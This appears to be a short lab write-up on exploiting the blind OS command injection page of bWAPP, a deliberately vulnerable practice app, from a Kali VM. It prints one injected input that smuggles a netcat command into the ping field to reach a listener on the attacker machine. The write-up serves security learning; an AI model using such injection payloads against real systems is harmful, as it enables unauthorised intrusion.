OS Command Injection on bWAPP
In this post, I will be exploiting the OS Command Injection — Blind section on the Buggy Web Application. This instance of bWAPP was hosted on an Docker container on an Ubuntu VM and will be exploited from a different Kali Linux VM. This aspect of bWAPP will be exploited on the low setting.
Upon selecting the OS Command Injection — Blind setting, this is what the user will see.
As shown on the image above, this page contains a single text box which will be used for the exploitation. Entering an IP address and hitting the ping button will result in the following.
To exploit this, I will use a command injection to establish a remote connection with the attacker VM. To begin, I will first use the netcat tool to listen on a port. In this case, I used port 4757.
Next, using a command injection, I will forward traffic from bWAPP to the command line. This will all be entered into the text box on bWAPP, with the input being a localhost address piped to nc with the IP address of the Kali VM, and the port being listened on. The command entered is “127.0.0.1|nc 192.168.48.133 4757”.
Going back to the terminal, the result shows that traffic is in fact being sent to the attacker VM, meaning that the text box has successfully been exploited.
In conclusion, I was successfully able to exploit the text box using a command injection on OS Command Injection-Blind page of bWAPP.